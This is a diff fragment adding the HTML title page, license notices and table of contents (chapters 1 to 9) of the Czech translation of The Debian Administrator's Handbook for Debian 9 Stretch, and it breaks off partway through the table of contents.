+        lang="cs-CZ"><div
+          class="titlepage"><div><div
+              class="producttitle"><span
+                xmlns:d="http://docbook.org/ns/docbook"
+                class="productname">Debian</span> <span
+                xmlns:d="http://docbook.org/ns/docbook"
+                class="productnumber">9</span></div><div><h1
+                class="title"><a
+                  id="the-debian-administrators-handbook"></a>The Debian Administrator's Handbook</h1></div><div><h2
+                class="subtitle">Debian Stretch from Discovery to Mastery</h2></div><p
+              xmlns:d="http://docbook.org/ns/docbook"
+              class="edition">Vydání 1</p><div><div
+                xml:lang="cs-CZ"
+                class="authorgroup"
+                lang="cs-CZ"><div
+                  class="author"><h3
+                    class="author"><span
+                      class="firstname">Raphaël</span> <span
+                      class="surname">Hertzog</span></h3><code
+                    class="email"><a
+                      class="email"
+                      href="mailto:hertzog@debian.org">hertzog@debian.org</a></code></div><div
+                  class="author"><h3
+                    class="author"><span
+                      class="firstname">Roland</span> <span
+                      class="surname">Mas</span></h3><code
+                    class="email"><a
+                      class="email"
+                      href="mailto:lolando@debian.org">lolando@debian.org</a></code></div></div></div><div><p
+                class="copyright">Copyright © 2003, 2004, 2005, 2006, 2007, 2008, 2009, 2010, 2011, 2012, 2013, 2014, 2015, 2016, 2017 Raphaël Hertzog</p></div><div><p
+                class="copyright">Copyright © 2006, 2007, 2008, 2009, 2010, 2011, 2012, 2013, 2014, 2015 Roland Mas</p></div><div><p
+                class="copyright">Copyright © 2012, 2013, 2014, 2015, 2016, 2017 Freexian SARL</p></div><div><div
+                class="legalnotice"><a
+                  id="id-1.1.9"></a><h1
+                  class="legalnotice">Právní doložka</h1><div
+                  class="para">
+			ISBN: 979-10-91414-16-6 (English paperback)
+		</div><div
+                  class="para">
+			ISBN: 979-10-91414-17-3 (English ebook)
+		</div><div
+                  class="para">
+			This book is available under the terms of two licenses compatible with the Debian Free Software Guidelines.
+		</div><div
+                  class="para"><div
+                    xmlns:d="http://docbook.org/ns/docbook"
+                    class="title">Creative Commons License Notice:</div>
+				This book is licensed under a Creative Commons Attribution-ShareAlike 3.0 Unported License. <div
+                    xmlns=""
+                    class="url">→ <a
+                      xmlns="http://www.w3.org/1999/xhtml"
+                      href="http://creativecommons.org/licenses/by-sa/3.0/">http://creativecommons.org/licenses/by-sa/3.0/</a></div>
+			</div><div
+                  class="para"><div
+                    xmlns:d="http://docbook.org/ns/docbook"
+                    class="title">GNU General Public License Notice:</div>
+				This book is free documentation: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 2 of the License, or (at your option) any later version.
+			</div><div
+                  class="para">
+			This book is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details.
+		</div><div
+                  class="para">
+			You should have received a copy of the GNU General Public License along with this program. If not, see <a
+                    href="http://www.gnu.org/licenses/">http://www.gnu.org/licenses/</a>.
+		</div><div
+                  xmlns:d="http://docbook.org/ns/docbook"
+                  class="important"><div
+                    class="admonition_header"><p><strong>Show your appreciation</strong></p></div><div
+                    class="admonition"><div
+                      class="para">
+				This book is published under a free license because we want everybody to benefit from it. That said maintaining it takes time and lots of effort, and we appreciate being thanked for this. If you find this book valuable, please consider contributing to its continued maintenance either by buying a paperback copy or by making a donation through the book's official website: <div
+                        xmlns=""
+                        class="url">→ <a
+                          xmlns="http://www.w3.org/1999/xhtml"
+                          href="http://debian-handbook.info">http://debian-handbook.info</a></div>
+			</div></div></div></div></div><div><div
+                class="abstract"><p
+                  class="title"><strong>Abstrakt</strong></p><div
+                  class="para">
+			A reference book presenting the Debian distribution, from initial installation to configuration of services.
+		</div></div></div></div></div><div
+          class="toc"><dl
+            class="toc"><dt><span
+                class="preface"><a
+                  href="preface.html">Úvodní slovo</a></span></dt><dt><span
+                class="preface"><a
+                  href="foreword.html">Předmluva</a></span></dt><dd><dl><dt><span
+                    class="section"><a
+                      href="foreword.html#sect.why-this-book">1. Proč tato kniha?</a></span></dt><dt><span
+                    class="section"><a
+                      href="sect.who-is-this-book-for.html">2. Pro koho je tato kniha?</a></span></dt><dt><span
+                    class="section"><a
+                      href="sect.selected-approach.html">3. Obecný přístup</a></span></dt><dt><span
+                    class="section"><a
+                      href="sect.book-structure.html">4. truktura knihy</a></span></dt><dt><span
+                    class="section"><a
+                      href="sect.acknowledgments.html">5. Poděkování</a></span></dt><dd><dl><dt><span
+                        class="section"><a
+                          href="sect.acknowledgments.html#id-1.3.9.2">5.1. Trocha historie</a></span></dt><dt><span
+                        class="section"><a
+                          href="sect.acknowledgments.html#id-1.3.9.3">5.2. Zvláštní poděkování přispěvatelům</a></span></dt><dt><span
+                        class="section"><a
+                          href="sect.acknowledgments.html#id-1.3.9.4">5.3. Díky překladatelům</a></span></dt><dt><span
+                        class="section"><a
+                          href="sect.acknowledgments.html#id-1.3.9.5">5.4. Osobní poděkování od Raphaëla</a></span></dt><dt><span
+                        class="section"><a
+                          href="sect.acknowledgments.html#id-1.3.9.6">5.5. Osobní poděkování od Rolanda</a></span></dt></dl></dd></dl></dd><dt><span
+                class="chapter"><a
+                  href="the-debian-project.html">1. Projekt Debian</a></span></dt><dd><dl><dt><span
+                    class="section"><a
+                      href="the-debian-project.html#sect.what-is-debian">1.1. Co je Debian?</a></span></dt><dd><dl><dt><span
+                        class="section"><a
+                          href="the-debian-project.html#id-1.4.4.8">1.1.1. Multiplatformní operační systém</a></span></dt><dt><span
+                        class="section"><a
+                          href="the-debian-project.html#id-1.4.4.9">1.1.2. Kvalita svobodného softwaru</a></span></dt><dt><span
+                        class="section"><a
+                          href="the-debian-project.html#id-1.4.4.10">1.1.3. Právní rámec: nezisková organizace</a></span></dt></dl></dd><dt><span
+                    class="section"><a
+                      href="sect.foundation-documents.html">1.2. Dokumenty nadace</a></span></dt><dd><dl><dt><span
+                        class="section"><a
+                          href="sect.foundation-documents.html#sect.social-contract">1.2.1. Závazek vůči uživatelům</a></span></dt><dt><span
+                        class="section"><a
+                          href="sect.foundation-documents.html#sect.dfsg">1.2.2. Pokyny Debianu pro svobodný software</a></span></dt></dl></dd><dt><span
+                    class="section"><a
+                      href="sect.debian-internals.html">1.3. Vnitřní fungování projektu Debian</a></span></dt><dd><dl><dt><span
+                        class="section"><a
+                          href="sect.debian-internals.html#id-1.4.6.5">1.3.1. Vývojáři Debianu</a></span></dt><dt><span
+                        class="section"><a
+                          href="sect.debian-internals.html#id-1.4.6.6">1.3.2. Aktivní role uživatelů</a></span></dt><dt><span
+                        class="section"><a
+                          href="sect.debian-internals.html#id-1.4.6.7">1.3.3. Týmy a podprojekty</a></span></dt></dl></dd><dt><span
+                    class="section"><a
+                      href="sect.follow-debian-news.html">1.4. Follow Debian News</a></span></dt><dt><span
+                    class="section"><a
+                      href="sect.role-of-distributions.html">1.5. The Role of Distributions</a></span></dt><dd><dl><dt><span
+                        class="section"><a
+                          href="sect.role-of-distributions.html#id-1.4.8.4">1.5.1. The Installer: <code
+                            class="command">debian-installer</code></a></span></dt><dt><span
+                        class="section"><a
+                          href="sect.role-of-distributions.html#id-1.4.8.5">1.5.2. The Software Library</a></span></dt></dl></dd><dt><span
+                    class="section"><a
+                      href="sect.release-lifecycle.html">1.6. Lifecycle of a Release</a></span></dt><dd><dl><dt><span
+                        class="section"><a
+                          href="sect.release-lifecycle.html#id-1.4.9.11">1.6.1. The <span
+                            class="distribution distribution">Experimental</span> Status</a></span></dt><dt><span
+                        class="section"><a
+                          href="sect.release-lifecycle.html#id-1.4.9.12">1.6.2. The <span
+                            class="distribution distribution">Unstable</span> Status</a></span></dt><dt><span
+                        class="section"><a
+                          href="sect.release-lifecycle.html#id-1.4.9.13">1.6.3. Migration to <span
+                            class="distribution distribution">Testing</span></a></span></dt><dt><span
+                        class="section"><a
+                          href="sect.release-lifecycle.html#id-1.4.9.14">1.6.4. The Promotion from <span
+                            class="distribution distribution">Testing</span> to <span
+                            class="distribution distribution">Stable</span></a></span></dt><dt><span
+                        class="section"><a
+                          href="sect.release-lifecycle.html#id-1.4.9.15">1.6.5. The <span
+                            class="distribution distribution">Oldstable</span> and <span
+                            class="distribution distribution">Oldoldstable</span> Status</a></span></dt></dl></dd></dl></dd><dt><span
+                class="chapter"><a
+                  href="case-study.html">2. Presenting the Case Study</a></span></dt><dd><dl><dt><span
+                    class="section"><a
+                      href="case-study.html#sect.fast-growing-it-needs">2.1. Fast Growing IT Needs</a></span></dt><dt><span
+                    class="section"><a
+                      href="sect.master-plan.html">2.2. Master Plan</a></span></dt><dt><span
+                    class="section"><a
+                      href="sect.why-gnu-linux.html">2.3. Why a GNU/Linux Distribution?</a></span></dt><dt><span
+                    class="section"><a
+                      href="sect.why-debian.html">2.4. Why the Debian Distribution?</a></span></dt><dd><dl><dt><span
+                        class="section"><a
+                          href="sect.why-debian.html#id-1.5.8.5">2.4.1. Commercial and Community Driven Distributions</a></span></dt></dl></dd><dt><span
+                    class="section"><a
+                      href="sect.why-debian-stable.html">2.5. Why Debian Stretch?</a></span></dt></dl></dd><dt><span
+                class="chapter"><a
+                  href="existing-setup.html">3. Analyzing the Existing Setup and Migrating</a></span></dt><dd><dl><dt><span
+                    class="section"><a
+                      href="existing-setup.html#sect.heterogeneous-environments">3.1. Coexistence in Heterogeneous Environments</a></span></dt><dd><dl><dt><span
+                        class="section"><a
+                          href="existing-setup.html#id-1.6.4.4">3.1.1. Integration with Windows Machines</a></span></dt><dt><span
+                        class="section"><a
+                          href="existing-setup.html#id-1.6.4.5">3.1.2. Integration with OS X machines</a></span></dt><dt><span
+                        class="section"><a
+                          href="existing-setup.html#id-1.6.4.6">3.1.3. Integration with Other Linux/Unix Machines</a></span></dt></dl></dd><dt><span
+                    class="section"><a
+                      href="sect.how-to-migrate.html">3.2. How To Migrate</a></span></dt><dd><dl><dt><span
+                        class="section"><a
+                          href="sect.how-to-migrate.html#id-1.6.5.4">3.2.1. Survey and Identify Services</a></span></dt><dt><span
+                        class="section"><a
+                          href="sect.how-to-migrate.html#id-1.6.5.5">3.2.2. Backing up the Configuration</a></span></dt><dt><span
+                        class="section"><a
+                          href="sect.how-to-migrate.html#id-1.6.5.6">3.2.3. Taking Over an Existing Debian Server</a></span></dt><dt><span
+                        class="section"><a
+                          href="sect.how-to-migrate.html#id-1.6.5.7">3.2.4. Installing Debian</a></span></dt><dt><span
+                        class="section"><a
+                          href="sect.how-to-migrate.html#id-1.6.5.8">3.2.5. Installing and Configuring the Selected Services</a></span></dt></dl></dd></dl></dd><dt><span
+                class="chapter"><a
+                  href="installation.html">4. Installation</a></span></dt><dd><dl><dt><span
+                    class="section"><a
+                      href="installation.html#sect.installation-methods">4.1. Installation Methods</a></span></dt><dd><dl><dt><span
+                        class="section"><a
+                          href="installation.html#sect.install-cd">4.1.1. Installing from a CD-ROM/DVD-ROM</a></span></dt><dt><span
+                        class="section"><a
+                          href="installation.html#sect.install-usb">4.1.2. Booting from a USB Key</a></span></dt><dt><span
+                        class="section"><a
+                          href="installation.html#sect.install-net">4.1.3. Installing through Network Booting</a></span></dt><dt><span
+                        class="section"><a
+                          href="installation.html#sect.install-auto">4.1.4. Other Installation Methods</a></span></dt></dl></dd><dt><span
+                    class="section"><a
+                      href="sect.installation-steps.html">4.2. Installing, Step by Step</a></span></dt><dd><dl><dt><span
+                        class="section"><a
+                          href="sect.installation-steps.html#sect.install-boot">4.2.1. Booting and Starting the Installer</a></span></dt><dt><span
+                        class="section"><a
+                          href="sect.installation-steps.html#sect.install-lang">4.2.2. Selecting the language</a></span></dt><dt><span
+                        class="section"><a
+                          href="sect.installation-steps.html#sect.install-country">4.2.3. Selecting the country</a></span></dt><dt><span
+                        class="section"><a
+                          href="sect.installation-steps.html#sect.install-keyboard">4.2.4. Selecting the keyboard layout</a></span></dt><dt><span
+                        class="section"><a
+                          href="sect.installation-steps.html#sect.install-detect-hardware">4.2.5. Detecting Hardware</a></span></dt><dt><span
+                        class="section"><a
+                          href="sect.installation-steps.html#sect.install-load-components">4.2.6. Loading Components</a></span></dt><dt><span
+                        class="section"><a
+                          href="sect.installation-steps.html#sect.install-detect-network">4.2.7. Detecting Network Hardware</a></span></dt><dt><span
+                        class="section"><a
+                          href="sect.installation-steps.html#sect.install-network-config">4.2.8. Configuring the Network</a></span></dt><dt><span
+                        class="section"><a
+                          href="sect.installation-steps.html#id-1.7.12.10">4.2.9. Administrator Password</a></span></dt><dt><span
+                        class="section"><a
+                          href="sect.installation-steps.html#id-1.7.12.11">4.2.10. Creating the First User</a></span></dt><dt><span
+                        class="section"><a
+                          href="sect.installation-steps.html#sect.install-clock-config">4.2.11. Configuring the Clock</a></span></dt><dt><span
+                        class="section"><a
+                          href="sect.installation-steps.html#sect.install-detect-disks">4.2.12. Detecting Disks and Other Devices</a></span></dt><dt><span
+                        class="section"><a
+                          href="sect.installation-steps.html#sect.install-partman">4.2.13. Starting the Partitioning Tool</a></span></dt><dt><span
+                        class="section"><a
+                          href="sect.installation-steps.html#id-1.7.12.15">4.2.14. Installing the Base System</a></span></dt><dt><span
+                        class="section"><a
+                          href="sect.installation-steps.html#id-1.7.12.16">4.2.15. Configuring the Package Manager (<code
+                            class="command">apt</code>)</a></span></dt><dt><span
+                        class="section"><a
+                          href="sect.installation-steps.html#id-1.7.12.17">4.2.16. Debian Package Popularity Contest</a></span></dt><dt><span
+                        class="section"><a
+                          href="sect.installation-steps.html#id-1.7.12.18">4.2.17. Selecting Packages for Installation</a></span></dt><dt><span
+                        class="section"><a
+                          href="sect.installation-steps.html#sect.installing-grub">4.2.18. Installing the GRUB Bootloader</a></span></dt><dt><span
+                        class="section"><a
+                          href="sect.installation-steps.html#id-1.7.12.20">4.2.19. Finishing the Installation and Rebooting</a></span></dt></dl></dd><dt><span
+                    class="section"><a
+                      href="sect.after-first-boot.html">4.3. After the First Boot</a></span></dt><dd><dl><dt><span
+                        class="section"><a
+                          href="sect.after-first-boot.html#id-1.7.13.5">4.3.1. Installing Additional Software</a></span></dt><dt><span
+                        class="section"><a
+                          href="sect.after-first-boot.html#id-1.7.13.6">4.3.2. Upgrading the System</a></span></dt></dl></dd></dl></dd><dt><span
+                class="chapter"><a
+                  href="packaging-system.html">5. Packaging System: Tools and Fundamental Principles</a></span></dt><dd><dl><dt><span
+                    class="section"><a
+                      href="packaging-system.html#sect.binary-package-structure">5.1. Structure of a Binary Package</a></span></dt><dt><span
+                    class="section"><a
+                      href="sect.package-meta-information.html">5.2. Package Meta-Information</a></span></dt><dd><dl><dt><span
+                        class="section"><a
+                          href="sect.package-meta-information.html#sect.control">5.2.1. Description: the <code
+                            class="filename">control</code> File</a></span></dt><dt><span
+                        class="section"><a
+                          href="sect.package-meta-information.html#sect.configuration-scripts">5.2.2. Configuration Scripts</a></span></dt><dt><span
+                        class="section"><a
+                          href="sect.package-meta-information.html#sect.conffiles">5.2.3. Checksums, List of Configuration Files</a></span></dt></dl></dd><dt><span
+                    class="section"><a
+                      href="sect.source-package-structure.html">5.3. Structure of a Source Package</a></span></dt><dd><dl><dt><span
+                        class="section"><a
+                          href="sect.source-package-structure.html#id-1.8.7.4">5.3.1. Format</a></span></dt><dt><span
+                        class="section"><a
+                          href="sect.source-package-structure.html#id-1.8.7.5">5.3.2. Usage within Debian</a></span></dt></dl></dd><dt><span
+                    class="section"><a
+                      href="sect.manipulating-packages-with-dpkg.html">5.4. Manipulating Packages with <code
+                        class="command">dpkg</code></a></span></dt><dd><dl><dt><span
+                        class="section"><a
+                          href="sect.manipulating-packages-with-dpkg.html#id-1.8.8.5">5.4.1. Installing Packages</a></span></dt><dt><span
+                        class="section"><a
+                          href="sect.manipulating-packages-with-dpkg.html#id-1.8.8.6">5.4.2. Package Removal</a></span></dt><dt><span
+                        class="section"><a
+                          href="sect.manipulating-packages-with-dpkg.html#id-1.8.8.7">5.4.3. Querying <code
+                            class="command">dpkg</code>'s Database and Inspecting <code
+                            class="filename">.deb</code> Files</a></span></dt><dt><span
+                        class="section"><a
+                          href="sect.manipulating-packages-with-dpkg.html#id-1.8.8.8">5.4.4. <code
+                            class="command">dpkg</code>'s Log File</a></span></dt><dt><span
+                        class="section"><a
+                          href="sect.manipulating-packages-with-dpkg.html#sect.multi-arch">5.4.5. Multi-Arch Support</a></span></dt></dl></dd><dt><span
+                    class="section"><a
+                      href="sect.coexistence-with-other-packaging-systems.html">5.5. Coexistence with Other Packaging Systems</a></span></dt></dl></dd><dt><span
+                class="chapter"><a
+                  href="apt.html">6. Maintenance and Updates: The APT Tools</a></span></dt><dd><dl><dt><span
+                    class="section"><a
+                      href="apt.html#sect.apt-sources.list">6.1. Filling in the <code
+                        class="filename">sources.list</code> File</a></span></dt><dd><dl><dt><span
+                        class="section"><a
+                          href="apt.html#id-1.9.10.6">6.1.1. Syntax</a></span></dt><dt><span
+                        class="section"><a
+                          href="apt.html#id-1.9.10.7">6.1.2. Repositories for <span
+                            class="distribution distribution">Stable</span> Users</a></span></dt><dt><span
+                        class="section"><a
+                          href="apt.html#id-1.9.10.8">6.1.3. Repositories for <span
+                            class="distribution distribution">Testing</span>/<span
+                            class="distribution distribution">Unstable</span> Users</a></span></dt><dt><span
+                        class="section"><a
+                          href="apt.html#id-1.9.10.9">6.1.4. Using Alternate Mirrors</a></span></dt><dt><span
+                        class="section"><a
+                          href="apt.html#id-1.9.10.10">6.1.5. Non-Official Resources: <code
+                            class="literal">mentors.debian.net</code></a></span></dt><dt><span
+                        class="section"><a
+                          href="apt.html#id-1.9.10.11">6.1.6. Caching Proxy for Debian Packages</a></span></dt></dl></dd><dt><span
+                    class="section"><a
+                      href="sect.apt-get.html">6.2. <code
+                        class="command">aptitude</code>, <code
+                        class="command">apt-get</code>, and <code
+                        class="command">apt</code> Commands</a></span></dt><dd><dl><dt><span
+                        class="section"><a
+                          href="sect.apt-get.html#id-1.9.11.8">6.2.1. Initialization</a></span></dt><dt><span
+                        class="section"><a
+                          href="sect.apt-get.html#id-1.9.11.9">6.2.2. Installing and Removing</a></span></dt><dt><span
+                        class="section"><a
+                          href="sect.apt-get.html#sect.apt-upgrade">6.2.3. System Upgrade</a></span></dt><dt><span
+                        class="section"><a
+                          href="sect.apt-get.html#sect.apt-config">6.2.4. Configuration Options</a></span></dt><dt><span
+                        class="section"><a
+                          href="sect.apt-get.html#sect.apt.priorities">6.2.5. Managing Package Priorities</a></span></dt><dt><span
+                        class="section"><a
+                          href="sect.apt-get.html#sect.apt-mix-distros">6.2.6. Working with Several Distributions</a></span></dt><dt><span
+                        class="section"><a
+                          href="sect.apt-get.html#sect.automatic-tracking">6.2.7. Tracking Automatically Installed Packages</a></span></dt></dl></dd><dt><span
+                    class="section"><a
+                      href="sect.apt-cache.html">6.3. The <code
+                        class="command">apt-cache</code> Command</a></span></dt><dt><span
+                    class="section"><a
+                      href="sect.apt-frontends.html">6.4. Frontends: <code
+                        class="command">aptitude</code>, <code
+                        class="command">synaptic</code></a></span></dt><dd><dl><dt><span
+                        class="section"><a
+                          href="sect.apt-frontends.html#sect.aptitude">6.4.1. <code
+                            class="command">aptitude</code></a></span></dt><dt><span
+                        class="section"><a
+                          href="sect.apt-frontends.html#id-1.9.13.7">6.4.2. <code
+                            class="command">synaptic</code></a></span></dt></dl></dd><dt><span
+                    class="section"><a
+                      href="sect.package-authentication.html">6.5. Checking Package Authenticity</a></span></dt><dt><span
+                    class="section"><a
+                      href="sect.dist-upgrade.html">6.6. Upgrading from One Stable Distribution to the Next</a></span></dt><dd><dl><dt><span
+                        class="section"><a
+                          href="sect.dist-upgrade.html#id-1.9.15.3">6.6.1. Recommended Procedure</a></span></dt><dt><span
+                        class="section"><a
+                          href="sect.dist-upgrade.html#id-1.9.15.4">6.6.2. Handling Problems after an Upgrade</a></span></dt></dl></dd><dt><span
+                    class="section"><a
+                      href="sect.regular-upgrades.html">6.7. Keeping a System Up to Date</a></span></dt><dt><span
+                    class="section"><a
+                      href="sect.automatic-upgrades.html">6.8. Automatic Upgrades</a></span></dt><dd><dl><dt><span
+                        class="section"><a
+                          href="sect.automatic-upgrades.html#id-1.9.17.5">6.8.1. Configuring <code
+                            class="command">dpkg</code></a></span></dt><dt><span
+                        class="section"><a
+                          href="sect.automatic-upgrades.html#id-1.9.17.6">6.8.2. Configuring APT</a></span></dt><dt><span
+                        class="section"><a
+                          href="sect.automatic-upgrades.html#id-1.9.17.7">6.8.3. Configuring <code
+                            class="command">debconf</code></a></span></dt><dt><span
+                        class="section"><a
+                          href="sect.automatic-upgrades.html#id-1.9.17.8">6.8.4. Handling Command Line Interactions</a></span></dt><dt><span
+                        class="section"><a
+                          href="sect.automatic-upgrades.html#id-1.9.17.9">6.8.5. The Miracle Combination</a></span></dt></dl></dd><dt><span
+                    class="section"><a
+                      href="sect.searching-packages.html">6.9. Searching for Packages</a></span></dt></dl></dd><dt><span
+                class="chapter"><a
+                  href="solving-problems.html">7. Solving Problems and Finding Relevant Information</a></span></dt><dd><dl><dt><span
+                    class="section"><a
+                      href="solving-problems.html#sect.documentation-sources">7.1. Documentation Sources</a></span></dt><dd><dl><dt><span
+                        class="section"><a
+                          href="solving-problems.html#sect.manual-pages">7.1.1. Manual Pages</a></span></dt><dt><span
+                        class="section"><a
+                          href="solving-problems.html#id-1.10.4.5">7.1.2. <span
+                            class="emphasis"><em>info</em></span> Documents</a></span></dt><dt><span
+                        class="section"><a
+                          href="solving-problems.html#id-1.10.4.6">7.1.3. Specific Documentation</a></span></dt><dt><span
+                        class="section"><a
+                          href="solving-problems.html#id-1.10.4.7">7.1.4. Websites</a></span></dt><dt><span
+                        class="section"><a
+                          href="solving-problems.html#id-1.10.4.8">7.1.5. Tutorials (<span
+                            class="emphasis"><em>HOWTO</em></span>)</a></span></dt></dl></dd><dt><span
+                    class="section"><a
+                      href="sect.common-procedures.html">7.2. Common Procedures</a></span></dt><dd><dl><dt><span
+                        class="section"><a
+                          href="sect.common-procedures.html#id-1.10.5.5">7.2.1. Configuring a Program</a></span></dt><dt><span
+                        class="section"><a
+                          href="sect.common-procedures.html#id-1.10.5.6">7.2.2. Monitoring What Daemons Are Doing</a></span></dt><dt><span
+                        class="section"><a
+                          href="sect.common-procedures.html#id-1.10.5.7">7.2.3. Asking for Help on a Mailing List</a></span></dt><dt><span
+                        class="section"><a
+                          href="sect.common-procedures.html#id-1.10.5.8">7.2.4. Reporting a Bug When a Problem Is Too Difficult</a></span></dt></dl></dd></dl></dd><dt><span
+                class="chapter"><a
+                  href="basic-configuration.html">8. Basic Configuration: Network, Accounts, Printing...</a></span></dt><dd><dl><dt><span
+                    class="section"><a
+                      href="basic-configuration.html#sect.config-language-support">8.1. Configuring the System for Another Language</a></span></dt><dd><dl><dt><span
+                        class="section"><a
+                          href="basic-configuration.html#sect.default-language">8.1.1. Setting the Default Language</a></span></dt><dt><span
+                        class="section"><a
+                          href="basic-configuration.html#sect.keyboard-config">8.1.2. Configuring the Keyboard</a></span></dt><dt><span
+                        class="section"><a
+                          href="basic-configuration.html#sect.utf8-migration">8.1.3. Migrating to UTF-8</a></span></dt></dl></dd><dt><span
+                    class="section"><a
+                      href="sect.network-config.html">8.2. Configuring the Network</a></span></dt><dd><dl><dt><span
+                        class="section"><a
+                          href="sect.network-config.html#sect.interface-ethernet">8.2.1. Ethernet Interface</a></span></dt><dt><span
+                        class="section"><a
+                          href="sect.network-config.html#sect.interface-wireless">8.2.2. Wireless Interface</a></span></dt><dt><span
+                        class="section"><a
+                          href="sect.network-config.html#sect.ppp-rtc">8.2.3. Connecting with PPP through a PSTN Modem</a></span></dt><dt><span
+                        class="section"><a
+                          href="sect.network-config.html#sect.adsl">8.2.4. Connecting through an ADSL Modem</a></span></dt><dt><span
+                        class="section"><a
+                          href="sect.network-config.html#sect.roaming-network-config">8.2.5. Automatic Network Configuration for Roaming Users</a></span></dt></dl></dd><dt><span
+                    class="section"><a
+                      href="sect.hostname-name-service.html">8.3. Setting the Hostname and Configuring the Name Service</a></span></dt><dd><dl><dt><span
+                        class="section"><a
+                          href="sect.hostname-name-service.html#sect.name-resolution">8.3.1. Name Resolution</a></span></dt></dl></dd><dt><span
+                    class="section"><a
+                      href="sect.user-group-databases.html">8.4. User and Group Databases</a></span></dt><dd><dl><dt><span
+                        class="section"><a
+                          href="sect.user-group-databases.html#sect.etc-passwd">8.4.1. User List: <code
+                            class="filename">/etc/passwd</code></a></span></dt><dt><span
+                        class="section"><a
+                          href="sect.user-group-databases.html#sect.etc-shadow">8.4.2. The Hidden and Encrypted Password File: <code
+                            class="filename">/etc/shadow</code></a></span></dt><dt><span
+                        class="section"><a
+                          href="sect.user-group-databases.html#sect.account-modification">8.4.3. Modifying an Existing Account or Password</a></span></dt><dt><span
+                        class="section"><a
+                          href="sect.user-group-databases.html#sect.disabling-account">8.4.4. Disabling an Account</a></span></dt><dt><span
+                        class="section"><a
+                          href="sect.user-group-databases.html#sect.etc-group">8.4.5. Group List: <code
+                            class="filename">/etc/group</code></a></span></dt></dl></dd><dt><span
+                    class="section"><a
+                      href="sect.creating-accounts.html">8.5. Creating Accounts</a></span></dt><dt><span
+                    class="section"><a
+                      href="sect.shell-environment.html">8.6. Shell Environment</a></span></dt><dt><span
+                    class="section"><a
+                      href="sect.config-printing.html">8.7. Printer Configuration</a></span></dt><dt><span
+                    class="section"><a
+                      href="sect.config-bootloader.html">8.8. Configuring the Bootloader</a></span></dt><dd><dl><dt><span
+                        class="section"><a
+                          href="sect.config-bootloader.html#sect.identify-disks">8.8.1. Identifying the Disks</a></span></dt><dt><span
+                        class="section"><a
+                          href="sect.config-bootloader.html#sect.config-lilo">8.8.2. Configuring LILO</a></span></dt><dt><span
+                        class="section"><a
+                          href="sect.config-bootloader.html#sect.config-grub">8.8.3. GRUB 2 Configuration</a></span></dt><dt><span
+                        class="section"><a
+                          href="sect.config-bootloader.html#sect.config-yaboot">8.8.4. For Macintosh Computers (PowerPC): Configuring Yaboot</a></span></dt></dl></dd><dt><span
+                    class="section"><a
+                      href="sect.config-misc.html">8.9. Other Configurations: Time Synchronization, Logs, Sharing Access…</a></span></dt><dd><dl><dt><span
+                        class="section"><a
+                          href="sect.config-misc.html#sect.timezone">8.9.1. Timezone</a></span></dt><dt><span
+                        class="section"><a
+                          href="sect.config-misc.html#sect.time-synchronization">8.9.2. Time Synchronization</a></span></dt><dt><span
+                        class="section"><a
+                          href="sect.config-misc.html#sect.rotation-logs">8.9.3. Rotating Log Files</a></span></dt><dt><span
+                        class="section"><a
+                          href="sect.config-misc.html#sect.sharing-admin-rights">8.9.4. Sharing Administrator Rights</a></span></dt><dt><span
+                        class="section"><a
+                          href="sect.config-misc.html#sect.fstab-mount-points">8.9.5. List of Mount Points</a></span></dt><dt><span
+                        class="section"><a
+                          href="sect.config-misc.html#sect.locate-updatedb">8.9.6. <code
+                            class="command">locate</code> and <code
+                            class="command">updatedb</code></a></span></dt></dl></dd><dt><span
+                    class="section"><a
+                      href="sect.kernel-compilation.html">8.10. Compiling a Kernel</a></span></dt><dd><dl><dt><span
+                        class="section"><a
+                          href="sect.kernel-compilation.html#sect.kernel-compilation-prerequisites">8.10.1. Introduction and Prerequisites</a></span></dt><dt><span
+                        class="section"><a
+                          href="sect.kernel-compilation.html#sect.kernel-sources">8.10.2. Getting the Sources</a></span></dt><dt><span
+                        class="section"><a
+                          href="sect.kernel-compilation.html#sect.config-kernel">8.10.3. Configuring the Kernel</a></span></dt><dt><span
+                        class="section"><a
+                          href="sect.kernel-compilation.html#sect.kernel-build">8.10.4. Compiling and Building the Package</a></span></dt><dt><span
+                        class="section"><a
+                          href="sect.kernel-compilation.html#sect.modules-build">8.10.5. Compiling External Modules</a></span></dt><dt><span
+                        class="section"><a
+                          href="sect.kernel-compilation.html#sect.kernel-patch">8.10.6. Applying a Kernel Patch</a></span></dt></dl></dd><dt><span
+                    class="section"><a
+                      href="sect.kernel-installation.html">8.11. Installing a Kernel</a></span></dt><dd><dl><dt><span
+                        class="section"><a
+                          href="sect.kernel-installation.html#sect.kernel-package">8.11.1. Features of a Debian Kernel Package</a></span></dt><dt><span
+                        class="section"><a
+                          href="sect.kernel-installation.html#sect.kernel-installation-with-dpkg">8.11.2. Installing with <code
+                            class="command">dpkg</code></a></span></dt></dl></dd></dl></dd><dt><span
+                class="chapter"><a
+                  href="unix-services.html">9. Unix Services</a></span></dt><dd><dl><dt><span
+                    class="section"><a
+                      href="unix-services.html#sect.system-boot">9.1. System Boot</a></span></dt><dd><dl><dt><span
+                        class="section"><a
+                          href="unix-services.html#sect.systemd">9.1.1. The systemd init system</a></span></dt><dt><span
+                        class="section"><a
+                          href="unix-services.html#sect.sysvinit">9.1.2. The System V init system</a></span></dt></dl></dd><dt><span
+                    class="section"><a
+                      href="sect.remote-login.html">9.2. Remote Login</a></span></dt><dd><dl><dt><span
+                        class="section"><a
+                          href="sect.remote-login.html#sect.ssh">9.2.1. Secure Remote Login: SSH</a></span></dt><dt><span
+                        class="section"><a
+                          href="sect.remote-login.html#sect.remote-desktops">9.2.2. Using Remote Graphical Desktops</a></span></dt></dl></dd><dt><span
+                    class="section"><a
+                      href="sect.rights-management.html">9.3. Managing Rights</a></span></dt><dt><span
+                    class="section"><a
+                      href="sect.administration-interfaces.html">9.4. Administration Interfaces</a></span></dt><dd><dl><dt><span
+                        class="section"><a
+                          href="sect.administration-interfaces.html#sect.webmin">9.4.1. Administrating on a Web Interface: <code
+                            class="command">webmin</code></a></span></dt><dt><span
+                        class="section"><a
+                          href="sect.administration-interfaces.html#sect.debconf">9.4.2. Configuring Packages: <code
+                            class="command">debconf</code></a></span></dt></dl></dd><dt><span
+                    class="section"><a
+                      href="sect.syslog.html">9.5. <code
+                        class="command">syslog</code> System Events</a></span></dt><dd><dl><dt><span
+                        class="section"><a
